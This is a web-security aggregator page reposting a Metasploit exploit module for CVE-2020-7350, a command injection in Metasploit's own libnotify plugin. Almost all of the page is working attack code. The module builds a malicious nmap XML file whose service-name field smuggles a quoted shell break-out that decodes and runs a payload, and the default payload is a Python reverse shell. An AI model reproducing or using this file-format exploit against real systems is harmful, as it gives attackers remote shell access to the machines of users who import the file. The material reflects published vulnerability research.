HackDig : Dig high-quality web security articles for hackers

Metasploit Libnotify Arbitrary Command Execution

2020-04-18 16:00
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::FILEFORMAT  def initialize(info = {})    super(update_info(info,                      'Name'           => 'Metasploit Libnotify Plugin Arbitrary Command Execution',                      'Description'    => %q(        This module exploits a shell command injection vulnerability in the        libnotify plugin. This vulnerability affects Metasploit versions        5.0.79 and earlier.      ),                      'DisclosureDate' => 'Mar 04 2020',                      'License'        => GPL_LICENSE,                      'Author'         =>                        [                          'pasta <jaguinaga@faradaysec.com>' # Discovery and PoC                        ],                      'References'     =>                        [                          [ 'CVE', '2020-7350' ],                          [ 'URL', 'https://github.com/rapid7/metasploit-framework/issues/13026' ]                        ],                      'Platform'       => 'unix',                      'Arch'           => ARCH_CMD,                      'Payload'        =>                        {                          'DisableNops' => true                        },                      'DefaultOptions' =>                        {                          'PAYLOAD' => 'cmd/unix/reverse_python'                        },                      'Targets' => [[ 'Automatic', {}]],                      'Privileged' => false,                      'DefaultTarget' => 0))    register_options(      [        OptString.new('FILENAME', [false, 'The file to write.', 'scan.xml']),      ]    )  end  def exploit    xml = %(<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE nmaprun><nmaprun scanner="nmap" args="nmap -P0 -oA pepito 192.168.20.121" start="1583503480" startstr="Fri Mar  6 11:04:40 2020" version="7.60" xmloutputversion="1.04"><host starttime="1583503480" endtime="1583503480"><status state="up" reason="user-set" reason_ttl="0"/><address addr="192.168.20.121" addrtype="ipv4"/><hostnames></hostnames><ports><port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh';python3 -c &quot;import os,base64;os.system(base64.b32decode(b'#{Rex::Text.encode_base32(payload.encoded)}'.upper()))&quot;&amp;; printf '" method="table" conf="3"/></port></ports><times srtt="6174" rttvar="435" to="100000"/></host><runstats><finished time="1583503480" timestr="Fri Mar  6 11:04:40 2020" elapsed="0.22" summary="Nmap done at Fri Mar  6 11:04:40 2020; 1 IP address (1 host up) scanned in 0.22 seconds" exit="success"/><hosts up="1" down="0" total="1"/></runstats></nmaprun>)    print_status "Writing xml file: #{datastore['FILENAME']}"    file_create xml  endend


Source: 7900400202-BLW/eussi/moc.ytirucesxc

Read:826 | Comments:0 | Tags:No Tag

“Metasploit Libnotify Arbitrary Command Execution”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Tools